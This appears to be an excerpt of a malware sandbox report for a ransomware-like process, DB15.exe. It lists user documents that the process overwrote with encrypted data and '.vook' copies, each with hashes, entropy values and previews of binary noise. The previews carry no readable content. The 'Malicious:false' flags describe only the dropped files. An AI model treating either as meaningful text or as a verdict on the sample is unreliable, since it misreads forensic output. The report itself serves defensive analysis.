                                                                                                                                                                                                                                      Preview:NVWZA A..Q!......z.=....j..Y..)..F...M..WI5...`.,.........[..z...NWG.=6..#.`8q.: .N....).LU.c.Y...uiJ....xMpp|zN..3..O.!.V....&b.4z.....L|....R?Xi...LT....?.VtX..'O 9v..._bDX5)..z}5....c.^=.....b.>....#....P.......0v......:C..m7X>@.?W,.?.....>.$..(c4.......bK.^...HSO.\..A..B.....f.Nj..I9......."=.....|.\.Cb...~a..f#*.Lc.n;.F@.21.Gv]Mg...z.D.<{E.&/].....\.Q.0p.$q;......[b...{...c....d..EP/..bU.H.@.7S....Z{Z....p..z...@+...D:.2>.*....{.s..........W.k.%.......A7.q.}Z.p<.J..'.......q..?.z.0`......n.F........2.[0Ms...Z..Z....)...W.|........Jh..*t8j...y...U..k$............$5F...88..........~iD...l...,.u.I'2.C..c..e.".6...T.Gb&D.}.,5.S5z?m2.....k.....Z..k.K..b......sIz..u........A......L....J...............4..S.K.....X....1(/~....6y..#{.......q\0..........A.r...U~O.@.............bD..9,....u5r)O,t".'.'7.A..u..G4.....Y...i\U.....7.:hvv.....G...1../B.7..Jk....t.\c....&..si.h.sg.t.Z.G.0..9..Q....pa.g`({R..]F8.$."....9XT0(.}4..<8O.S.wK..?k.}v3.M

                                                                                                                                                                                                                                      C:\Users\user\Documents\NVWZAPQSQL.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.866289837104292
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:FxyMOeg3CGDI7Psx1dSI5xvLz8Yci082SALFOeFk3ZJspJLJMfZy+XDNiTkbD:FxRyDDoSSI5tQ182t3FoZeTLJQZzYiD
                                                                                                                                                                                                                                      MD5:5C5E35D4BA95B063E6D5D10ADE39D343
                                                                                                                                                                                                                                      SHA1:F2D3C2D03C6E98A3DED116B54DFA924751B841F1
                                                                                                                                                                                                                                      SHA-256:658CEEC5F49415A16617965BE8AC0C7620CEE74DEC577D86B74524248FE8E39B
                                                                                                                                                                                                                                      SHA-512:5C8A57C1F34CC5C78B13192C2118263F5A7E11D3A4174460DBD806285B99AB0D86D65B94FF6DF742B62EEC20EB3091D33A24C2FAB1D0C1FBAC889FF2BF02B6DE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NVWZA A..Q!......z.=....j..Y..)..F...M..WI5...`.,.........[..z...NWG.=6..#.`8q.: .N....).LU.c.Y...uiJ....xMpp|zN..3..O.!.V....&b.4z.....L|....R?Xi...LT....?.VtX..'O 9v..._bDX5)..z}5....c.^=.....b.>....#....P.......0v......:C..m7X>@.?W,.?.....>.$..(c4.......bK.^...HSO.\..A..B.....f.Nj..I9......."=.....|.\.Cb...~a..f#*.Lc.n;.F@.21.Gv]Mg...z.D.<{E.&/].....\.Q.0p.$q;......[b...{...c....d..EP/..bU.H.@.7S....Z{Z....p..z...@+...D:.2>.*....{.s..........W.k.%.......A7.q.}Z.p<.J..'.......q..?.z.0`......n.F........2.[0Ms...Z..Z....)...W.|........Jh..*t8j...y...U..k$............$5F...88..........~iD...l...,.u.I'2.C..c..e.".6...T.Gb&D.}.,5.S5z?m2.....k.....Z..k.K..b......sIz..u........A......L....J...............4..S.K.....X....1(/~....6y..#{.......q\0..........A.r...U~O.@.............bD..9,....u5r)O,t".'.'7.A..u..G4.....Y...i\U.....7.:hvv.....G...1../B.7..Jk....t.\c....&..si.h.sg.t.Z.G.0..9..Q....pa.g`({R..]F8.$."....9XT0(.}4..<8O.S.wK..?k.}v3.M

                                                                                                                                                                                                                                      C:\Users\user\Documents\PWCCAWLGRE.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.831024057566736
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:JsxIjOG6AjK5LOu3f84wtJPmaqnkHoJm+wSOKHZ11aOgAetzlfAFw1uQFNSAuPlC:OI9jKl3f848JPwLJm+w2D1aAetzlfZFV
                                                                                                                                                                                                                                      MD5:55978B0FDFE549C64C50210B9F48B6BE
                                                                                                                                                                                                                                      SHA1:120C73ECF72B69AD363A703205329F659A5C7E1E
                                                                                                                                                                                                                                      SHA-256:E2B4111D411E27CCA52F31E57064F99F74F4741A9E17170CFAB3E3862D384495
                                                                                                                                                                                                                                      SHA-512:9B4186788E135F618A6682DF280C7A2CDA6B33F10C3EF1A54F890311DFA5AFA982B091A23719F1845246D19744A33B22F54DB7C7ACD003BA370BB6FCD8B52219
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA.....2M..`.k.S.MVB.UdL,m-..Y.%4._a:`..%.|]...Lu..>..N1Y.._[.K&.. .w.".p.......^...G....=.?vl.3..................PVAq...GrE.iI...;...~.g.|mK.G...r&..<.j..;.A..^.zh*o...H.Z h..o....:..m..".....y......v..6@........@..l-....h6G_.!..d........r..w.z...(p../P9!u@...q.{\t.].[..8&. .' ......QH.VB h".=.EJ.. ...Y.u.5..d.....;0...?...Wo......d.....g.s....p...+.@...t....S.8..s..42..bY...3z..M.2._I)} .d...U..Yo...nN.....3{....Up.......=..M.j.(.....i.5...Ve..l.....v.E*....FB.v...........>..c:....O....A=.r.......t.....q..0.j......C.6.TDX.z...E..)..0Qp...7..1.....|@.0...;Y.>.}.=...{..$.....J.Xn5..q.d;....5..S. ..iJ9....=.f.?.e...S...._....I.M,....I.;A...hJ.G.9........0.zl....LS.K.."...[....@j..4.(*..m9...B.u.`7'....`o....... .W....e......4C.0..V.`.s.W...XM.........yt...Z.....6.?.-pI]..s.d()..?0.Y.V..S..R.iP.bX.(5....lqa...p'dex`.<.'..Fw...b.....6{.r.|...P.oB...U........{Xx.,.V..vY.....<.....|G..<.iq.H?..DAC..].D.5.....?..N......S..z..|

                                                                                                                                                                                                                                      C:\Users\user\Documents\PWCCAWLGRE.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.831024057566736
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:JsxIjOG6AjK5LOu3f84wtJPmaqnkHoJm+wSOKHZ11aOgAetzlfAFw1uQFNSAuPlC:OI9jKl3f848JPwLJm+w2D1aAetzlfZFV
                                                                                                                                                                                                                                      MD5:55978B0FDFE549C64C50210B9F48B6BE
                                                                                                                                                                                                                                      SHA1:120C73ECF72B69AD363A703205329F659A5C7E1E
                                                                                                                                                                                                                                      SHA-256:E2B4111D411E27CCA52F31E57064F99F74F4741A9E17170CFAB3E3862D384495
                                                                                                                                                                                                                                      SHA-512:9B4186788E135F618A6682DF280C7A2CDA6B33F10C3EF1A54F890311DFA5AFA982B091A23719F1845246D19744A33B22F54DB7C7ACD003BA370BB6FCD8B52219
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA.....2M..`.k.S.MVB.UdL,m-..Y.%4._a:`..%.|]...Lu..>..N1Y.._[.K&.. .w.".p.......^...G....=.?vl.3..................PVAq...GrE.iI...;...~.g.|mK.G...r&..<.j..;.A..^.zh*o...H.Z h..o....:..m..".....y......v..6@........@..l-....h6G_.!..d........r..w.z...(p../P9!u@...q.{\t.].[..8&. .' ......QH.VB h".=.EJ.. ...Y.u.5..d.....;0...?...Wo......d.....g.s....p...+.@...t....S.8..s..42..bY...3z..M.2._I)} .d...U..Yo...nN.....3{....Up.......=..M.j.(.....i.5...Ve..l.....v.E*....FB.v...........>..c:....O....A=.r.......t.....q..0.j......C.6.TDX.z...E..)..0Qp...7..1.....|@.0...;Y.>.}.=...{..$.....J.Xn5..q.d;....5..S. ..iJ9....=.f.?.e...S...._....I.M,....I.;A...hJ.G.9........0.zl....LS.K.."...[....@j..4.(*..m9...B.u.`7'....`o....... .W....e......4C.0..V.`.s.W...XM.........yt...Z.....6.?.-pI]..s.d()..?0.Y.V..S..R.iP.bX.(5....lqa...p'dex`.<.'..Fw...b.....6{.r.|...P.oB...U........{Xx.,.V..vY.....<.....|G..<.iq.H?..DAC..].D.5.....?..N......S..z..|

                                                                                                                                                                                                                                      C:\Users\user\Documents\PWCCAWLGRE.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.840083635210966
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:emz3+yllNjrlh9ub7jeEI+t71ctNNC/CJlJcA5UF7abWLoAhiTkbD:BzOElN1mbn2O5WNs/wc+q1LRgiD
                                                                                                                                                                                                                                      MD5:6C094171C7C120C85B21FF7B3C8BD6AE
                                                                                                                                                                                                                                      SHA1:D4D9F40129E6FC34F0029DE8EE6D9688464EACCF
                                                                                                                                                                                                                                      SHA-256:F589F2F72A3F2C699FC39101A701B4B0905C1712FF14DB3D044905F94D333A28
                                                                                                                                                                                                                                      SHA-512:EFAA6A9A9F8DBBFF83E74656CB7CAD5F645F100A310077DD4EF6B96E683CFEB500EF19CE9059298EF071644F8631C55CA9CF07B87FF7D438B1BE7E6A552660E5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA<UF.\.H...d..?.....Z.>[....+..B..R....k......@?.....v...}(w.v.VqT.m<..A.....p...`..f.p...".(.["....9...[...?.....P.y{.`..R....Jv!^....c..AO2L..OA.5...8.....s|kMl.....m..D...\(.d..._.Ka..i5..k..i....}tyAo.k..w..4.8.%z......@......&7[4..a0...:.s.6..`[...:x..M.Y.]*..^ .nI.2c..b...VZ.....aR0.....n..b.R;..y..}..\d..K.7......y>..m......j!A.d.........L...Va....4^)^.X.W..pM......P.>e...1.d...c.az......_..@c.rZ:...2.......u....{...3....X.K.N..^.).....~z..T..'.&....G.....t)..........l.Hn}.d.js.b9.1[.od.)..)M.....-.....-.......t.7..x....J....U.`..}`D. ._Cl.......e5VX7n.k....&..2..(..ZI..Jf...E..j_.BP...^...^j.......5.H...XEl..#..SQ....~I.4....#.&..s7...H...?<.../..i.16..^..5.....J...2l......)....O4$@.....9...}*....ki1...4q...9T.E6..}...W.c.$Mo.....+..[.b...R$...4T.%.#..8...!. .|..4..Y..D.-....!..............`z......{..U..e....UPkWe.+x.._;.........N..................nam.x...g.f...-.,.....U........5..........#..:e......s....].D....~1.w...y.L..

                                                                                                                                                                                                                                      C:\Users\user\Documents\PWCCAWLGRE.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.840083635210966
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:emz3+yllNjrlh9ub7jeEI+t71ctNNC/CJlJcA5UF7abWLoAhiTkbD:BzOElN1mbn2O5WNs/wc+q1LRgiD
                                                                                                                                                                                                                                      MD5:6C094171C7C120C85B21FF7B3C8BD6AE
                                                                                                                                                                                                                                      SHA1:D4D9F40129E6FC34F0029DE8EE6D9688464EACCF
                                                                                                                                                                                                                                      SHA-256:F589F2F72A3F2C699FC39101A701B4B0905C1712FF14DB3D044905F94D333A28
                                                                                                                                                                                                                                      SHA-512:EFAA6A9A9F8DBBFF83E74656CB7CAD5F645F100A310077DD4EF6B96E683CFEB500EF19CE9059298EF071644F8631C55CA9CF07B87FF7D438B1BE7E6A552660E5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA<UF.\.H...d..?.....Z.>[....+..B..R....k......@?.....v...}(w.v.VqT.m<..A.....p...`..f.p...".(.["....9...[...?.....P.y{.`..R....Jv!^....c..AO2L..OA.5...8.....s|kMl.....m..D...\(.d..._.Ka..i5..k..i....}tyAo.k..w..4.8.%z......@......&7[4..a0...:.s.6..`[...:x..M.Y.]*..^ .nI.2c..b...VZ.....aR0.....n..b.R;..y..}..\d..K.7......y>..m......j!A.d.........L...Va....4^)^.X.W..pM......P.>e...1.d...c.az......_..@c.rZ:...2.......u....{...3....X.K.N..^.).....~z..T..'.&....G.....t)..........l.Hn}.d.js.b9.1[.od.)..)M.....-.....-.......t.7..x....J....U.`..}`D. ._Cl.......e5VX7n.k....&..2..(..ZI..Jf...E..j_.BP...^...^j.......5.H...XEl..#..SQ....~I.4....#.&..s7...H...?<.../..i.16..^..5.....J...2l......)....O4$@.....9...}*....ki1...4q...9T.E6..}...W.c.$Mo.....+..[.b...R$...4T.%.#..8...!. .|..4..Y..D.-....!..............`z......{..U..e....UPkWe.+x.._;.........N..................nam.x...g.f...-.,.....U........5..........#..:e......s....].D....~1.w...y.L..

                                                                                                                                                                                                                                      C:\Users\user\Documents\PWCCAWLGRE.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.85701332726591
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:p8BNlzXiby50ZJnHZnPao/ZLedFEfockUHJLWdZqhnqJGiTkbD:w7Sby+XnHAIedFuLJqWhnqZiD
                                                                                                                                                                                                                                      MD5:174B2F0ADF0F94E1997EB895AE3CEBAE
                                                                                                                                                                                                                                      SHA1:16D414241D83F1BED71BC4FDCD3F06E0DF83A6B9
                                                                                                                                                                                                                                      SHA-256:1A23D35E42E810B11A31DD35434D9E1B10A51C19D103B65F3AEFF45B08DF12A5
                                                                                                                                                                                                                                      SHA-512:90CD421E6B8E8A79C81FFBAF08F4DF92123C24C9C40B1FEF0A792A85AC242F8D4179C8D9168B20050D910D2ADC04B967C6C4C078FBEF3567CDB8189B9F7E466D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA{J......@6* .....(...CT&LOr..+...|...g.5....rC.K.r].W.Ru\bL3...[..2.a.....@.H%U.[.rH..m..../w...o.{.../.....}h.]..S.z....(.....Q........R......iA../...:..8..q=..E..M..s..........'fHx..l.YI.^.....>..f?.'F."..Q%...R.(...z..6..<...@<.../r..98..X...D.].X.x..K......P..J.g.o..."b..~`..sl...+m.Nor..........fN.....=...2...6...}a.L...*.A.. \.u.4k..n.6.."....7Q$..4F.......o...{.W.]A..S...=;j_D....!+.q..)..x....GG..d....!......D`..0D...?K.PND...}v....o...1...xv46Z..H.kJ.7.[.Ay.;.....y..^i.g..5....4..n....~[f......'.G.7....R..&!.cvK....J....b.......#HLj.F....2.X..]..J.t........7Wd|.....xu8...G."..|.......b.....C..L.}[....&[...M..g...#.H$.yP...... ...n]...B....y.P...hw.5;sN..Ki.....]..>M....M...IH.V@[4.HT....=....p...Ux.4a...:N...-....../F.n.x.(..nZ.....x.....:&.*wpK/.n...-.Ry6.0w.O>.$D...0.z...9.S..+C.B....9.O..|-1|.{..,..z.....x*..v.(M...g.=..HC..........5q.-.=.../..g....(.5N.0...#@%.i...{..../.w...,F.i"w._.2.9........vm...O.K_O.l<.a

                                                                                                                                                                                                                                      C:\Users\user\Documents\PWCCAWLGRE.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.85701332726591
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:p8BNlzXiby50ZJnHZnPao/ZLedFEfockUHJLWdZqhnqJGiTkbD:w7Sby+XnHAIedFuLJqWhnqZiD
                                                                                                                                                                                                                                      MD5:174B2F0ADF0F94E1997EB895AE3CEBAE
                                                                                                                                                                                                                                      SHA1:16D414241D83F1BED71BC4FDCD3F06E0DF83A6B9
                                                                                                                                                                                                                                      SHA-256:1A23D35E42E810B11A31DD35434D9E1B10A51C19D103B65F3AEFF45B08DF12A5
                                                                                                                                                                                                                                      SHA-512:90CD421E6B8E8A79C81FFBAF08F4DF92123C24C9C40B1FEF0A792A85AC242F8D4179C8D9168B20050D910D2ADC04B967C6C4C078FBEF3567CDB8189B9F7E466D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA{J......@6* .....(...CT&LOr..+...|...g.5....rC.K.r].W.Ru\bL3...[..2.a.....@.H%U.[.rH..m..../w...o.{.../.....}h.]..S.z....(.....Q........R......iA../...:..8..q=..E..M..s..........'fHx..l.YI.^.....>..f?.'F."..Q%...R.(...z..6..<...@<.../r..98..X...D.].X.x..K......P..J.g.o..."b..~`..sl...+m.Nor..........fN.....=...2...6...}a.L...*.A.. \.u.4k..n.6.."....7Q$..4F.......o...{.W.]A..S...=;j_D....!+.q..)..x....GG..d....!......D`..0D...?K.PND...}v....o...1...xv46Z..H.kJ.7.[.Ay.;.....y..^i.g..5....4..n....~[f......'.G.7....R..&!.cvK....J....b.......#HLj.F....2.X..]..J.t........7Wd|.....xu8...G."..|.......b.....C..L.}[....&[...M..g...#.H$.yP...... ...n]...B....y.P...hw.5;sN..Ki.....]..>M....M...IH.V@[4.HT....=....p...Ux.4a...:N...-....../F.n.x.(..nZ.....x.....:&.*wpK/.n...-.Ry6.0w.O>.$D...0.z...9.S..+C.B....9.O..|-1|.{..,..z.....x*..v.(M...g.=..HC..........5q.-.=.../..g....(.5N.0...#@%.i...{..../.w...,F.i"w._.2.9........vm...O.K_O.l<.a

                                                                                                                                                                                                                                      C:\Users\user\Documents\QNCYCDFIJJ.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.831854557054104
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:plkaOIIdQi+bagjZKEQfiMBmXbfUFlMXmKeyAe2oKJDUf8K8yNzJWjFiTkbD:HHICHZPQfiMBTFlgjAOKJDUdWj8iD
                                                                                                                                                                                                                                      MD5:79B816017AD5B6646E429D6BD449AF82
                                                                                                                                                                                                                                      SHA1:2398268D664C511407C99AD4739930D3B1554FF7
                                                                                                                                                                                                                                      SHA-256:CD30E29EF3CA1BD56DC5C6A4507CE9F6C72737D781526F88F371785E5D8E6BDF
                                                                                                                                                                                                                                      SHA-512:2E815076E0B2DB7CD5F2F4B9AA8FACF600089E254739EB2C77B09974F577E44084EA47968E7CCB08469A2D18911656E4D16B4EAE128931E3F162BAF20AF0F445
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:QNCYC&f>...N.a2..GY....i...#.....wB...f.`oX.S(p....6.f{X}_...X...*;.....R...o...[\..".X.(.]\..3...Q.WI...4[..|[..+..7g.8.Sf'?n0..N>.6.....c..24...W2.7g..B.*.'{f7.ju*;FX.&IH.s..E.*C...|.....B...r..5.Lv.@.G.=..O....z.<..3:...d2.b..\.....S.^.9.....t.........7.1....A..m..8.:i.G..L.Pb.7....H....L..2.: ..`P.-.)v../k.h....W....6.=.. ......4.4...!...9.K.......2H.x/.+6O..M..ADJ.."S...{..:..fV`P.Q..g9.6V...u.*...Q...d0.L..*..?R.{s..V8.@..?....D.)..a(.9.d..4..4.rM......aG... .........H.L..a.....(Gr**v.=...74v..#.....7..z.....L..;C_T:zk..\..!;.L;......FT..g.Q........DR0..`{soT>F7DE...\Pf\.g.~~...7 ..=^...A.|..X..=3M.X.5.K -.../q.n....oq....O....._..........{..2..Go.O...Ek".n.c...u.* ,..tS9.|....T3]..@..Ej.. .Ny...<Uy._.n........'(..(.......o...3.3..3.;.VQ3...{y..... ;G\([i.`N..p..gI...D..q&......@07.s...7..aS...6.#..Tp`.R.......@].4............H.#u/.T.,.7F.b.:(..[...^ha...,.~|B...(....#.Ut..J./&...<.V.:.J..).J5at1..0W..O.C......`&.e.40[t.t.X.4.

                                                                                                                                                                                                                                      C:\Users\user\Documents\QNCYCDFIJJ.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.831854557054104
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:plkaOIIdQi+bagjZKEQfiMBmXbfUFlMXmKeyAe2oKJDUf8K8yNzJWjFiTkbD:HHICHZPQfiMBTFlgjAOKJDUdWj8iD
                                                                                                                                                                                                                                      MD5:79B816017AD5B6646E429D6BD449AF82
                                                                                                                                                                                                                                      SHA1:2398268D664C511407C99AD4739930D3B1554FF7
                                                                                                                                                                                                                                      SHA-256:CD30E29EF3CA1BD56DC5C6A4507CE9F6C72737D781526F88F371785E5D8E6BDF
                                                                                                                                                                                                                                      SHA-512:2E815076E0B2DB7CD5F2F4B9AA8FACF600089E254739EB2C77B09974F577E44084EA47968E7CCB08469A2D18911656E4D16B4EAE128931E3F162BAF20AF0F445
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:QNCYC&f>...N.a2..GY....i...#.....wB...f.`oX.S(p....6.f{X}_...X...*;.....R...o...[\..".X.(.]\..3...Q.WI...4[..|[..+..7g.8.Sf'?n0..N>.6.....c..24...W2.7g..B.*.'{f7.ju*;FX.&IH.s..E.*C...|.....B...r..5.Lv.@.G.=..O....z.<..3:...d2.b..\.....S.^.9.....t.........7.1....A..m..8.:i.G..L.Pb.7....H....L..2.: ..`P.-.)v../k.h....W....6.=.. ......4.4...!...9.K.......2H.x/.+6O..M..ADJ.."S...{..:..fV`P.Q..g9.6V...u.*...Q...d0.L..*..?R.{s..V8.@..?....D.)..a(.9.d..4..4.rM......aG... .........H.L..a.....(Gr**v.=...74v..#.....7..z.....L..;C_T:zk..\..!;.L;......FT..g.Q........DR0..`{soT>F7DE...\Pf\.g.~~...7 ..=^...A.|..X..=3M.X.5.K -.../q.n....oq....O....._..........{..2..Go.O...Ek".n.c...u.* ,..tS9.|....T3]..@..Ej.. .Ny...<Uy._.n........'(..(.......o...3.3..3.;.VQ3...{y..... ;G\([i.`N..p..gI...D..q&......@07.s...7..aS...6.#..Tp`.R.......@].4............H.#u/.T.,.7F.b.:(..[...^ha...,.~|B...(....#.Ut..J./&...<.V.:.J..).J5at1..0W..O.C......`&.e.40[t.t.X.4.

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.842953375869171
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:buAt+w7SbEnecxwLfpDbj+k2lNocnALLcAkAqB5Tw53FEg6FOaiTkbD:buAU4pwRbYlNocnALxwDTw5hPiD
                                                                                                                                                                                                                                      MD5:F24489A497E50745E3763EF0B60A29B1
                                                                                                                                                                                                                                      SHA1:710D3D9F1C086CC8C78E4E03DCEBAF5FA7613A21
                                                                                                                                                                                                                                      SHA-256:642BEAFF01FB3996D5DC9D9875F36AA06315F05994FB51CF44FC404DCAB7AEDD
                                                                                                                                                                                                                                      SHA-512:AFE52C4AB2D1EE6B55C864FBD160F4E88F35176F6F672744F3FF33B0D13909BF87DDD9D2D3E803DE6B894016B9D77E735F8FDBF86491742BD2B00D7F991C074A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUSbID.2:F...+............cM..p*...>..S,.Ho..?.p..Y..>.M.Bt...7|.'.G.....R...HWz...y.s.....D.=..fZ;&NT@..m..@K....b.....;.5.i^....$8....'7$7....../.%.DY...X..i\.....p...mC.ca...W...z....3$..2..% ..WG.y .%'..Bp.@.y.Lq..Y.D.....*..@f...A...=...._..M#P..X. T.`)..I..+:C_q..^.1..B.....r(.LP.a|5.........j...6.nw.../.zn.l2.).F[...>..8...t:D.q|n.:..=....T.u<.........4...'..).W#..'..Y.3)P.l...W.....9]..f?$.T...0T1..g.+.......~./a......C...:QN......4-W...T..]..D.Yg#..ZS.F.@....6.&@^2|.I.8....p.f.s.....J*..6ZA.z...~eY.... ....J...t.s....b......+n.)..t/...mo|yMW.1.....[.t.\..B.h..h..q..;"5.. T...x%.mSc.].0..fG.1...ZIt......D..-) {....N..,|X....4f.......6...1....T...j.Nt...*.....Jun7..;.Lx.o.uu)c!s.K.....x..!....@...?V.....2...n*C.....RPy...w.lF`Ew..C.a./..../.z....6|...%h#...."MO.V#...|..)...U...r..P.2........o.Y[./8f..~....KL.S.a...<.)..K..$f8..0^(...#..O./......x..y.%!.Y&..@..~E.......j._G........^..f..}/.F.....*...............b;..K.U.H..^....it.....bR..._...."

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.842953375869171
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:buAt+w7SbEnecxwLfpDbj+k2lNocnALLcAkAqB5Tw53FEg6FOaiTkbD:buAU4pwRbYlNocnALxwDTw5hPiD
                                                                                                                                                                                                                                      MD5:F24489A497E50745E3763EF0B60A29B1
                                                                                                                                                                                                                                      SHA1:710D3D9F1C086CC8C78E4E03DCEBAF5FA7613A21
                                                                                                                                                                                                                                      SHA-256:642BEAFF01FB3996D5DC9D9875F36AA06315F05994FB51CF44FC404DCAB7AEDD
                                                                                                                                                                                                                                      SHA-512:AFE52C4AB2D1EE6B55C864FBD160F4E88F35176F6F672744F3FF33B0D13909BF87DDD9D2D3E803DE6B894016B9D77E735F8FDBF86491742BD2B00D7F991C074A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUSbID.2:F...+............cM..p*...>..S,.Ho..?.p..Y..>.M.Bt...7|.'.G.....R...HWz...y.s.....D.=..fZ;&NT@..m..@K....b.....;.5.i^....$8....'7$7....../.%.DY...X..i\.....p...mC.ca...W...z....3$..2..% ..WG.y .%'..Bp.@.y.Lq..Y.D.....*..@f...A...=...._..M#P..X. T.`)..I..+:C_q..^.1..B.....r(.LP.a|5.........j...6.nw.../.zn.l2.).F[...>..8...t:D.q|n.:..=....T.u<.........4...'..).W#..'..Y.3)P.l...W.....9]..f?$.T...0T1..g.+.......~./a......C...:QN......4-W...T..]..D.Yg#..ZS.F.@....6.&@^2|.I.8....p.f.s.....J*..6ZA.z...~eY.... ....J...t.s....b......+n.)..t/...mo|yMW.1.....[.t.\..B.h..h..q..;"5.. T...x%.mSc.].0..fG.1...ZIt......D..-) {....N..,|X....4f.......6...1....T...j.Nt...*.....Jun7..;.Lx.o.uu)c!s.K.....x..!....@...?V.....2...n*C.....RPy...w.lF`Ew..C.a./..../.z....6|...%h#...."MO.V#...|..)...U...r..P.2........o.Y[./8f..~....KL.S.a...<.)..K..$f8..0^(...#..O./......x..y.%!.Y&..@..~E.......j._G........^..f..}/.F.....*...............b;..K.U.H..^....it.....bR..._...."

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.850619925626221
                                                                                                                                                                                                                                      Encrypted:false
